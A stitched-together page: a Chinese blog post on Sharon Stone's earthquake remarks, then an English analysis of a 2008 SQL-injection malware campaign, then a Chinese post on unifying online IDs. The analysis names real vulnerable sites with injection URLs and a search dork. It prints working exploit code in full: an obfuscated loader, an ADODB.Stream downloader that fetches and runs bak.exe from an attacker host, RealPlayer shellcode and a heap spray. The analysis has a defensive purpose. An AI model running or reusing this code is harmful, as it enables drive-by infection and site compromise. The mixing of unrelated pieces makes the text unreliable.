最近实在是没有心情更新，不过今天忍不住了。

interesting和karma是这两天最热门的词汇。

仔细看过好几遍视频，虽然Sharon Stone活该被口水淹没，但我不得不说一句：那个interesting不是直接说地震这件事本身的。她的的确确是说她的态度发生转变这个过程interesting。

我同意某些网友的观点：仅从这段言论来看，she’s more of a retard than a bitch.

当然，面对无辜死去的灾民，哪怕有一秒“这是报应吧？”这样的想法，就绝对不可饶恕，但我们至少不要歪曲事实，不然岂不是跟小人一般见识？Sharon Stone那段话的目的是想要突出自己“学会了对敌人友善”的崇高境界，显然是想往自己脸上贴金。就冲着这个目的，她也不可能说地震死了那么多人是“有趣”的事。

顺便说句，最讨厌明星不懂装懂，借着被采访的机会宣传自己的“政治理念”。你固然有你的言论自由，我也有鄙视和抵制你的权利。搞不清楚状况就闭嘴，不要对其他国家内政妄加评论，丢人现眼。

顺便送一篇文章给所有不懂装懂的老外： http://www.workers.org/2008/world/anti-china_0424/ 作者也是老外，至少这位不脑残！

再送一段视频：

A new wave of massive SQL injection is spreading while we speak. Symantec raised the threat level to yellow[1] based upon the news. I went on to analyze the current threat and noticed that it is a variant of the previous one, but this time a new Flash vulnerability[2] is being exploited in the latest Flash player, as well as old Real player flaws that are still alive. The current Google search gave me around 58.000 infected websites that had Javascript in the title as well as other HTML objects and locations. This indicates the same approach as before, and undoubtedly done by the same group of attackers. I also noticed that part of the malware is being reused, this can be verified by querying Google for parts of the code as a query.

The new propagating hosts are two servers in China namely:

http://www.dota11.cn

http://www.woai117.cn

I queried Google for the websites and analyzed the results. I took a random batch of samples, to test them upon programming mistakes. It showed me that nearly every websites was vulnerable to parameter SQL injection targeting solely Microsoft ASP based webapplications. As you can see below, a simple parameter injection on the samples proves the theory that the attackers are not targeting specific software, but rather perform a random approach and most likely utilize the search engines to locate vulnerable ASP webapplications.

Six random chosen samples from Google. Notice the single quotes I put there to illustrate the problem:

http://www.hyundaideinum.nl/page_dealer.asp?dealerId=14801'&sPageID=100,050,000

http://guestbook.netlogics.nl/guestbook.asp?Name=BostonTeaParty&Page=2'

http://www.netonline.be/reizen/hotels_stad.asp?stadcode=1911'

http://www.dievel.be/blog/template_permalink.asp?id=133'

http://www.bockhoudt.nl/page_dealer.asp?sPageID=100,010,100&id=33&model=TERRACAN&dealerId=10798'

http://www.norden.org/webb/nordnamn/ViewPersons.asp?pid=1854'&lang=6&m_id=6&m_typ=Lowermenu

All these sites gave SQL errors upon pentesting them with a single quote, indicating a vulnerable webapplication that the attackers successfully injected with malware.

Locating such webapllications is trivial, all one need to do is gather a list of parameters used by programmers and query for them. Such list can be accumulated like so:

id=

sid=

Pageid=

sPage=

or simply:

allinurl:.asp?id=  -for a generic wildcard.

The current files being propagated through the injected victims as malware are listed below, I wrote a short explanation of what they are and do.

dj.htm

<iframe src='http://www.dota11.cn/123.htm' width='100' height='0'></iframe>



<HTML>

<BODY>

<title>Silent love China</title>

<script>

var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}

document.write(base64decode ("PHNjcmlwdD53aW5kb3cub25lcnJvcj1mdW5jdGlvbigpe3JldHVybiB0cnVlO308L3NjcmlwdD4NCjxTY3JpcHQgTGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCXZhciBjb29rID0gInNpbGVudHdtIjsNCgkNCglmdW5jdGlvbiBzZXRDb29raWUobmFtZSwgdmFsdWUsIGV4cGlyZSkgDQoJeyAgIA0KCQl3aW5kb3cuZG9jdW1lbnQuY29va2llID0gbmFtZSArICI9IiArIGVzY2FwZSh2YWx1ZSkgKyAoKGV4cGlyZSA9PSBudWxsKSA/ICIiIDogKCI7IGV4cGlyZXM9IiArIGV4cGlyZS50b0dNVFN0cmluZygpKSk7DQoJfQ0KDQoJZnVuY3Rpb24gZ2V0Q29va2llKE5hbWUpIA0KCXsgICANCgkJdmFyIHNlYXJjaCA9IE5hbWUgKyAiPSI7DQoJCWlmICh3aW5kb3cuZG9jdW1lbnQuY29va2llLmxlbmd0aCA+IDApIA0KCQl7IA0KCQkJb2Zmc2V0ID0gd2luZG93LmRvY3VtZW50LmNvb2tpZS5pbmRleE9mKHNlYXJjaCk7DQoJCQlpZiAob2Zmc2V0ICE9IC0xKSANCgkJCXsgDQoJCQkJb2Zmc2V0ICs9IHNlYXJjaC5sZW5ndGg7ICAgICAgIA0KCQkJICBlbmQgPSB3aW5kb3cuZG9jdW1lbnQuY29va2llLmluZGV4T2YoIjsiLCBvZmZzZXQpICAgICAgIA0KCQkJICBpZiAoZW5kID09IC0xKQ0KCQkJICAgIGVuZCA9IHdpbmRvdy5kb2N1bWVudC5jb29raWUubGVuZ3RoOw0KCQkJICByZXR1cm4gdW5lc2NhcGUod2luZG93LmRvY3VtZW50LmNvb2tpZS5zdWJzdHJpbmcob2Zmc2V0LCBlbmQpKTsNCgkJCSB9DQoJCSB9DQoJICByZXR1cm4gbnVsbDsNCgl9DQoNCglmdW5jdGlvbiByZWdpc3RlcihuYW1lKSANCgl7DQoJCXZhciB0b2RheSA9IG5ldyBEYXRlKCk7DQoJCXZhciBleHBpcmVzID0gbmV3IERhdGUoKTsNCgkJZXhwaXJlcy5zZXRUaW1lKHRvZGF5LmdldFRpbWUoKSArIDEwMDAqNjAqNjAqMjQpOw0KCQlzZXRDb29raWUoY29vaywgbmFtZSwgZXhwaXJlcyk7DQoJfQ0KDQoJZnVuY3Rpb24gb3BlbldNKCkgDQoJew0KCQl2YXIgYyA9IGdldENvb2tpZShjb29rKTsNCgkJaWYgKGMgIT0gbnVsbCkgDQoJCXsNCgkgIAlyZXR1cm47DQoJCX0NCgkJDQoJCXJlZ2lzdGVyKGNvb2spOw0KCQkNCgkJd2luZG93LmRlZmF1bHRTdGF0dXM9IuWujOaIkCI7DQoJCQkNCgkJdHJ5eyB2YXIgZTsNCgkJCXZhciBhZG89KGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoIm9iamVjdCIpKTsNCgkJCWFkby5zZXRBdHRyaWJ1dGUoImNsYXNzaWQiLCJjbHNpZDpCRDk2QzU1Ni02NUEzLTExRDAtOTgzQS0wMEMwNEZDMjlFMzYiKTsNCgkJCXZhciBhcz1hZG8uY3JlYXRlb2JqZWN0KCJBZG9kYi5TdHJlYW0iLCIiKX0NCgkJY2F0Y2goZSl7fTsNCgkJZmluYWxseXsNCgkJCWlmKGUhPSJbb2JqZWN0IEVycm9yXSIpew0KCQkJCWRvY3VtZW50LndyaXRlKCI8aWZyYW1lIHdpZHRoPTUwIGhlaWdodD0wIHNyYz0xNC5odG0+PC9pZnJhbWU+Iil9DQoJCQllbHNlDQoJCQl7CQ0KCQkJCXRyeXsgdmFyIGo7DQoJCQkJCXZhciByZWFsMTE9bmV3IEFjdGl2ZVhPYmplY3QoIklFUlAiKyJDdGwuSSIrIkVSUEN0bC4xIik7fQ0KCQkJCWNhdGNoKGope307DQoJCQkJZmluYWxseXtpZihqIT0iW29iamVjdCBFcnJvcl0iKXtpZihuZXcgQWN0aXZlWE9iamVjdCgiSUVSUEN0bC5JRVJQQ3RsLjEiKS5QbGF5ZXJQcm9wZXJ0eSgiUFJPRFVDVFZFUlNJT04iKTw9IjYuMC4xNC41NTIiKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHtkb2N1bWVudC53cml0ZSgnPGlmcmFtZSB3aWR0aD0xMCBoZWlnaHQ9MCBzcmM9cmwuaHRtPjwvaWZyYW1lPicpfQ0KICAgICAgICAgICAgICAgICAgICAgICAgIGVsc2UNCiAgICAgICAgICAgICAgICAgICAgICAgICB7DQoJCQkJCWRvY3VtZW50LndyaXRlKCc8aWZyYW1lIHdpZHRoPTEwIGhlaWdodD0wIHNyYz1uZXcuaHRtPjwvaWZyYW1lPicpfX19DQoNCgkJCQkJZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9NTAgaGVpZ2h0PTAgc3JjPTA0Lmh0bT48L2lmcmFtZT4nKQ0KDQoJCQkJaWYoaj09IltvYmplY3QgRXJyb3JdIikNCgkJCQl7bG9jYXRpb24ucmVwbGFjZSgiYWJvdXQ6YmxhbmsiKTt9DQoJCQl9fQ0KCX0NCg0Kb3BlbldNKCk7DQo8L3NjcmlwdD4="));

</script>

</BODY>

</HTML>

Which I decoded to the script below:

<script>window.onerror=function(){return true;}</script> 



<Script Language="JScript">  



var cook = "silentwm"; function setCookie(name, value, expire) { 

window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString())); } 

function getCookie(Name) { var search = Name + "="; if (window.document.cookie.length > 0) { 

offset = window.document.cookie.indexOf(search); if (offset != -1) { offset += search.length; 

end = window.document.cookie.indexOf(";", offset) if (end == -1) end = window.document.cookie.length; 

return unescape(window.document.cookie.substring(offset, end)); } } return null; } function register(name) { 

var today = new Date(); var expires = new Date(); expires.setTime(today.getTime() + 1000*60*60*24); 

setCookie(cook, name, expires); } function openWM() { var c = getCookie(cook); if (c != null) { return; } 

register(cook); window.defaultStatus="å®&#140;æ&#136; "; try{ var e; var ado=(document.createElement("object")); 

ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","")} 

catch(e){}; finally{ if(e!="[object Error]"){ document.write("<iframe width=50 height=0 src=14.htm></iframe>")} 

else { try{ var j; var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");} catch(j){}; finally{if(j!="[object Error]"){

if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552") {

document.write('<iframe width=10 height=0 src=rl.htm></iframe>')} else { 

document.write('<iframe width=10 height=0 src=new.htm></iframe>')}}} 

document.write('<iframe width=50 height=0 src=04.htm></iframe>') if(j=="[object Error]") {

location.replace("about:blank");} }} } openWM(); </script>"

123.htm

<html>

<script>

window.onerror=function(){return true;}

function init(){window.status="";}window.onload = init;

if(document.cookie.indexOf("play=")==-1)

{

	var expires=new Date();

	expires.setTime(expires.getTime()+24*60*60*1000);

	document.cookie="play=Yes;path=/;expires="+expires.toGMTString();

	if(navigator.userAgent.toLowerCase().indexOf("msie")>0)

	{

		document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');

		document.write('<param name="allowScriptAccess" value="sameDomain"/>');

		document.write('<param name="movie" value="http://www.woai117.cn/4561.swf"/>');

		document.write('<param name="quality" value="high"/>');

		document.write('<param name="bgcolor" value="#ffffff"/>');

		document.write('<embed src="http://www.woai117.cn/4561.swf"/>');

		document.write('</object>');

	}

	else

	{

		document.write("<EMBED src=http://www.woai117.cn/4562.swf width=0 height=0>");

	}

}

</script>

</html>

I decompiled the flash objects, and they contain the following Flash actionscripts which load other movies. I did try to locate the other movies based upon version info, but I was not successful yet based on guessing the version of Flash that is being evalled in action script.

4561.swf

var fVersion = eval("/:$version");

loadMovie("http://www.woai117.cn/" + fVersion + "i.swf",_root);

stop();

4562.swf

var fVersion = eval("/:$version");

loadMovie("http://www.woai117.cn/" + fVersion + "f.swf",_root);

stop();

Another function that loads in a trojan called: bak.exe the used clsid is RDS.DataControl: BD96C556-65A3-11D0-983A-00C04FC29E36 (MS06-014)

function gn(n)

{

var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';

}

lj="http://www.woai117.cn/bak.exe";

try

{ aaa="o";

yyy="ct";

ccc="Adod";

ddd="b.Stream";

eee="Microsoft.XMLHTT"+"";

ggg="o";

kkk="p";

mmm="e";

sss="n";

var df=document.createElement(aaa+"bje"+yyy);

df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");

var x=df.CreateObject(eee,"");

var S=df.CreateObject(ccc+ddd,"");

S.type=1;

x.open("GET", lj,0);

x.send();

mz1=gn(10000);

var F=df.CreateObject("Scripting.FileSystemObject","");

var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);

S.Open();

ttt=x.responseBody;

S.Write(ttt);

i=2;

S.SaveToFile(mz1,i); S.Close();

var Q=df.CreateObject("Shell.Application","");

exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe');

Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);

} catch(i) { i=1; }

14.htm

<script language="javaScript">

function gn(n) 

{ 

var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; 

} 

lj="http://www.woai117.cn/bak.exe";

try 

{ aaa="o";

yyy="ct";

ccc="Adod";

ddd="b.Stream";

eee="Microsoft.XMLHTT"+"P";

ggg="o";

kkk="p";

mmm="e";

sss="n";

var df=document.createElement(aaa+"bje"+yyy); 

df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); 

var x=df.CreateObject(eee,""); 

var S=df.CreateObject(ccc+ddd,""); 

S.type=1; 

x.open("GET", lj,0);

x.send(); 

mz1=gn(10000); 

var F=df.CreateObject("Scripting.FileSystemObject",""); 

var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1); 

S.Open();

ttt=x.responseBody;

S.Write(ttt); 

i=2;

S.SaveToFile(mz1,i); S.Close(); 

var Q=df.CreateObject("Shell.Application",""); 

exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe'); 

Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0); 

} catch(i) { i=1; } 

</script>&nbsp;

This is somewhat quirky, it seems to load in audio for RealPlayer and Netmeeting:

r1.htm

<script>

var pao1="LLLL\\XXXXXLD";

var pao2=pao1;

var pao3="c:\\Program Files\\NetMeeti";

var pao4="ng\\..\\..\\WINDOWS\\Media\\chime";

var pao5="s.wav";

var pao6=pao3+pao4+pao5;

var pao7="c:\\Program Files\\Ne";

var pao8="tMeeting\\TestSn";

var pao9="d.wav";

var pao0=pao7+pao8+pao9;

var pps1="C:\\WINDOWS\\system32";

var pps2="\\BuzzingBee.wav";

var pps3=pps1+pps2;

var pps4="C:\\WINDOWS\\clock.avi";

var pps5="c:\\Program Files\\NetMeeting";

var pps6="\\..\\..\\WINDOWS\\Media\\tada.wav";

var pps7=pps5+pps6;

var paopaopaopaopaopaopao=pps7;

var pps8="C:\\WINDOWS\\syste";

var pps9="m32\\LoopyMusic.wav";

var pps0=pps8+pps9;

var sel1="IERPCtl.I";

var sel2="ERPCtl.1";

var sel3=sel1+sel2;

var x1="%75"+"%06"+"%74"+"%04";

var x2="%7f"+"%a5"+"%60";

var x3="%4f"+"%71"+"%a4"+"%60";

var x4="%63"+"%11"+"%08"+"%60";

var x5="%63"+"%11"+"%04"+"%60";

var x6="%79"+"%31"+"%01"+"%60";

var x7="%79"+"%31"+"%09"+"%60";

var x8="%51"+"%11"+"%70"+"%63";

var pplive=[x1,x2,x3,x4,x5,x6,x7,x8];

</script><script>

The real exploit

function RealExploit()

{

	var user=navigator.userAgent["toLowerCase"]();



	if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return;

	if(user.indexOf("nt 5.")==-1) return;



	creobj=sel3;



	try{ Realpao = new window["ActiveXObject"](creobj); }

	catch(error){ return; }



	RealVersion = Realpao.PlayerProperty("PRODUCTVERSION");



	var reading="";

	var tiaozhuan=unescape(pplive[0]);

	var fanhui;



	for(i=0;i<32*148;i++)

		reading+="S";



	if(RealVersion.indexOf("6.0.14.")==-1)

	{

		if(navigator.userLanguage.toLowerCase()=="zh-cn") fanhui=unescape(pplive[1]);

		else if(navigator.userLanguage.toLowerCase()=="en-us") fanhui=unescape(pplive[2]);

		else return;

	}

	else if(RealVersion=="6.0.14.544") fanhui=unescape(pplive[3]);

	else if(RealVersion=="6.0.14.550") fanhui=unescape(pplive[4]);

	else if(RealVersion=="6.0.14.552") fanhui=unescape(pplive[5]);

	else if(RealVersion=="6.0.14.543") fanhui=unescape(pplive[6]);

	else if(RealVersion=="6.0.14.536") fanhui=unescape(pplive[7]);

	else return;



	if(RealVersion.indexOf("6.0.10.")!=-1)

	{

		for(i=0;i<4;i++)

			reading=reading+tiaozhuan;

			reading=reading+fanhui;

	}

	else if(RealVersion.indexOf("6.0.11.")!=-1)

	{

		for(i=0;i<6;i++)

			reading=reading+tiaozhuan;

			reading=reading+fanhui;

	}

	else if(RealVersion.indexOf("6.0.12.")!=-1)

	{

		for(i=0;i<9;i++)

			reading=reading+tiaozhuan;

			reading=reading+fanhui;

	}

	else if(RealVersion.indexOf("6.0.14.")!=-1)

	{

		for(i=0;i<10;i++)

			reading=reading+tiaozhuan;

			reading=reading+fanhui;

	}



	var pplivecode="";

	pplivecode=pplivecode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";

	pplivecode=pplivecode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJM";

	pplivecode=pplivecode+"WVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfx";

	pplivecode=pplivecode+"W6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKp";

	pplivecode=pplivecode+"TRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMW";

	pplivecode=pplivecode+"QuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJM";

	pplivecode=pplivecode+"mLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRWQgrWTnPw0o3QU96QUadwtnasPntou20aPkFNPeT8Quopwp";

	realzh=reading+pao2+pplivecode;

	temp=0x8000; while(realzh["length"] < temp) realzh+="hohoho";

        var paopaopao=pao6;

	var arr1=[pao6,pao0,pps3,pps4,pps7,pps0];

	Realpao["import"](arr1[Math.floor(Math["random"]()*6)], realzh, "", 0, 0);

}

RealExploit();

</script>

Again a RealPlayer exploit that utilizes heap spraying:

new.htm

<html><body>

<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="Silent"></object>

<script language="JavaScript">

var pao0 ="pao7468pao7074pao2f3apao772fpao7777pao772epao616fpao3169pao3731pao632epao2f6epao6162pao2e6bpao7865pao0065";

var pao1="pao9090pao6090pao17ebpao645epao30a1pao0000pao0500pao0800pao0000paof88bpao00b9";

var pao2="pao0004paof300paoffa4paoe8e0paoffe4paoffffpaoa164pao0030pao0000pao408bpao8b0c";

var pao3="pao1c70pao8badpao0870paoec81pao0200pao0000paoec8bpaoe8bbpao020fpao8b00pao8503";

var pao4="pao0fc0paobb85pao0000paoff00paoe903pao0221pao0000pao895bpao205dpao6856paofe98";

var pao5="pao0e8apaob1e8pao0000pao8900pao0c45pao6856pao4e8epaoec0epaoa3e8pao0000pao8900";

var pao6="pao0445pao6856pao79c1paob8e5pao95e8pao0000pao8900pao1c45pao6856paoc61bpao7946";

var pao7="pao87e8pao0000pao8900pao1045pao6856paofcaapao7c0dpao79e8pao0000pao8900pao0845";

var pao8="pao6856pao84e7paob469pao6be8pao0000pao8900pao1445paoe0bbpao020fpao8900pao3303";

var pao9="paoc7f6pao2845pao5255pao4d4cpao45c7pao4f2cpao004epao8d00pao285dpaoff53pao0455";

</script>

<script language="JavaScript">

var pao10="pao6850pao1a36pao702fpao3fe8pao0000pao8900pao2445pao7f6apao5d8dpao5328pao55ff";

var pao11="paoc71cpao0544pao5c28pao652epaoc778pao0544pao652cpao0000pao5600pao8d56pao287d";

var pao12="paoff57pao2075paoff56pao2455pao5756pao55ffpaoe80cpao0062pao0000paoc481pao0200";

var pao13="pao0000pao3361paoc2c0pao0004pao8b55pao51ecpao8b53pao087dpao5d8bpao560cpao738b";

var pao14="pao8b3cpao1e74pao0378pao56f3pao768bpao0320pao33f3pao49c9paoad41paoc303pao3356";

var pao15="pao0ff6pao10bepaof23apao0874paocec1pao030dpao40f2paof1ebpaofe3bpao755epao5ae5";

var pao16="paoeb8bpao5a8bpao0324pao66ddpao0c8bpao8b4bpao1c5apaodd03pao048bpao038bpao5ec5";

var pao17="pao595bpaoc25dpao0008pao92e9pao0000pao5e00pao80bfpao020cpaob900pao0100pao0000";

var pao18="paoa4f3paoec81pao0100pao0000paofc8bpaoc783paoc710pao6e07pao6474paoc76cpao0447";

var pao19="pao006cpao0000paoff57pao0455pao4589paoc724pao5207pao6c74paoc741pao0447pao6c6c";

var pao20="pao636fpao47c7pao6108pao6574paoc748pao0c47pao6165pao0070pao5057pao55ffpao8b08";

var pao21="paob8f0pao0fe4pao0002pao3089pao07c7pao736dpao6376pao47c7pao7204pao0074pao5700";

var pao22="pao55ffpao8b04pao3c48pao8c8bpao8008pao0000pao3900pao0834pao0474paof9e2pao12eb";

var pao23="pao348dpao5508pao406apao046apaoff56pao1055pao06c7pao0c80pao0002paoc481pao0100";

var pao24="pao0000paoe8c3paoff69paoffffpao048bpao5324pao5251pao5756paoecb9pao020fpao8b00";

var pao25="pao8519pao75dbpao3350pao33c9pao83dbpao06e8paob70fpao8118paofffbpao0015pao7500";

var pao26="pao833epao06e8paob70fpao8118paofffbpao0035pao7500pao8330pao02e8paob70fpao8318";

var pao27="pao6afbpao2575paoc083pao8b04paob830pao0fe0pao0002pao0068pao0000pao6801pao1000";

var pao28="pao0000pao006apao10ffpao0689pao4489pao1824paoecb9pao020fpaoff00pao5f01pao5a5e";

var pao29=pao1+pao2+pao3+pao4+pao5+pao6+pao7+pao8+pao9+pao10+pao11+pao12+pao13;

var pao30=pao14+pao15+pao16+pao17+pao18+pao19+pao20+pao21+pao22+pao23+pao24;

var pao31="pao90"+"90pao"+"90"+"90"+pao29+pao30+pao25+pao26+pao27+pao28+"pao5b59paoe4b8pao020fpaoff00paoe820paofddapaoffff";

var pao32=pao31+pao0;

</script>

<script language="JavaScript">

var Paoyezuiai = unescape(pao32.replace(/pao/g,"\x25\x75"));

var bigblock = unescape("%u0"+"C0C%u0C"+"0C");

var headersize = 20;

var shell=slackspace;

var slackspace = headersize + Paoyezuiai.length;

while (bigblock.length < slackspace) bigblock += bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock.substring(0,bigblock.length - slackspace);

while (block.length + slackspace < 0x40000) block = block + block + fillblock;

var memory = new Array();

for (i = 0; i < 400; i++){ memory[i] = block + Paoyezuiai }

var buf = '';

while (buf.length < 32) buf = buf + unescape("%0"+"C");

var m = '';

m = Silent.Console;

Silent.Console = buf;

Silent.Console = m;

m = Silent.Console;

Silent.Console = buf;

Silent.Console = m;

</script>

</body></html>

They log statistics too:

m.js

<script src=http://www.dota11.cn/m.js></script>



if (navigator.systemLanguage=='zh-cn')

{

document.writeln("<iframe src=http:\/\/gm.culhs.com\/abc\/am6.htm width=100 height=0><\/iframe>");

}

else{

document.writeln("<iframe src=http:\/\/www.dota11.cn\/dj.htm width=100 height=0><\/iframe>");

}

window.onerror=function(){return true};

document.write ('<script>var a7123tf="51la";var a7123pu="";var a7123pf="51la";var a7123su=window.location;var a7123sf=document.referrer;var a7123of="";var a7123op="";var a7123ops=1;var a7123ot=1;var a7123d=new Date();var a7123color="";if (navigator.appName=="Netscape"){a7123color=screen.pixelDepth;} else {a7123color=screen.colorDepth;}<\/script><script>a7123tf=top.document.referrer;<\/script><script>a7123pu =window.parent.location;<\/script><script>a7123pf=window.parent.document.referrer;<\/script><script>a7123ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7123ops=(a7123ops==null)?1: (parseInt(unescape((a7123ops)[2]))+1);var a7123oe =new Date();a7123oe.setTime(a7123oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7123ops+ ";path=/;expires="+a7123oe.toGMTString();a7123ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7123ot==null){a7123ot=1;}else{a7123ot=parseInt(unescape((a7123ot)[2])); a7123ot=(a7123ops==1)?(a7123ot+1)a7123ot);}a7123oe.setTime(a7123oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7123ot+";path=/;expires="+a7123oe.toGMTString();<\/script><script>a7123of=a7123sf;if(a7123pf!=="51la"){a7123of=a7123pf;}if(a7123tf!=="51la"){a7123of=a7123tf;}a7123op=a7123pu;try{lainframe}catch(e){a7123op=a7123su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=11&id=1897123&tpages=\'+a7123ops+\'&ttimes=\'+a7123ot+\'&tzone=\'+(0-a7123d.getTimezoneOffset()/60)+\'&tcolor=\'+a7123color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7123of)+\'&vpage=\'+escape(a7123op)+\'" \/>\');<\/script>');

My conclusion is that the person(s) who wrote this malware and their idea of propagating it through SQL injection, are not very cautious. They do obfuscate a lot of code, but their problem of getting noticed so quickly is because of the identical signatures they leave behind. In my opinion, they should drop the title injection, because that can be queried upon very reliably. That leads to the idea that this is a fairly new way of propagating malware through many websites that it is not perfect yet. So either this is a learning curve for the attackers, or they are pragmatic in their approach and want to spread malware quickly for various reasons without the care of being spotted. In either case, for the security industry it is a stroke of luck because it can be made much more stealthy as we see here.

Well, I guess the game is on. I think webapplication hacking is here to stay for a long time and certainly replaced many other forms of attacking surfers because of it's enormous scalability webapplications hold. The last massive SQL injection victimized over half a million websites! And this beast just got his wings.

By the way, anyone interested in developing/sponsoring Synapse now? :)

[1] http://www.symantec.com/security_response/threatconlearn.jsp
[2] http://www.securityfocus.com/bid/29386

这篇贴子是在整理《网摘与注释: 活动即识别, 身份即信用》的时候写的，发现太多了，就把它剪切出来放在草稿里单独成篇，今天放出来给大家看看。

写blog的人通常会有很多ID。人们需要把这些ID尽可能地整合起来，提高传播个人品牌的效率，本来在网络空间传播个人品牌就已经非常困难，人为的障碍就更需要尽早消除。

最基础的是各类网络工具的帐号，电子邮件地址和IM即时通讯帐号，很多人有多个电子邮件地址和IM即时通讯帐号。这些帐号也分成注册时的用户名，以及在使用过程中用户自行设置的名字，例如电子邮件可以设置一个用户名在电子邮件地址前面，例如小容没有注册到Oliver Ding的gmail邮箱，用的是swordi来做gmail的用户名，就把Oliver Ding设置成呢称（nickname），让它和电子邮件地址 同时存在。即时通讯也可以让用户随时设置呢称（nickname）。

不论是使用blog软件独立架设blog，或者是在BSP(blog服务提供商)那里注册一个帐号，都会有一个用户名，这个ID会在发表每篇贴子时出现，算是署名；接下来，blog的名字也是一个ID；再接下来，有的人会为自己申请一个独立域名，并且把这个独立域名指向到blog去，这个独立域名也是一个ID。值得注意的是在RSS阅读器里，blog用户名、blog名字都会出现，而独立域名却不会直接显示出来。

此外，活跃在各个网站的用户，还会拥有各个网站的帐号，其中有些网站要求使用实名，有些网站限制使用英文字符为用户名，有些网站则不支持中文作为用户名。而且，还存在着帐号撞车的现象，热门网站的用户名资源是有限的，后来者就不能如愿以偿地得到自己想要的用户名。

在这么多ID的情况下，如何将ID身份元素降低到最少呢？！小容的一个小建议是，尽可能注册一个英文独立域名。如果你能想到一个没有被人想到的英文独立域名，那么，你应当也可以顺利地在其他网络基本工具网站注册到这个用户名。

资源推荐：

Own Your Identity
http://www.ownyouridentity.com/

这是Joshua Porter和其他几个blogger一起写的群组Blog，刚刚创建没有多久。如果你了解社会性软件的几个基本元素的话，那么，看这个blog会对其中的Identity这个元素有更多的了解。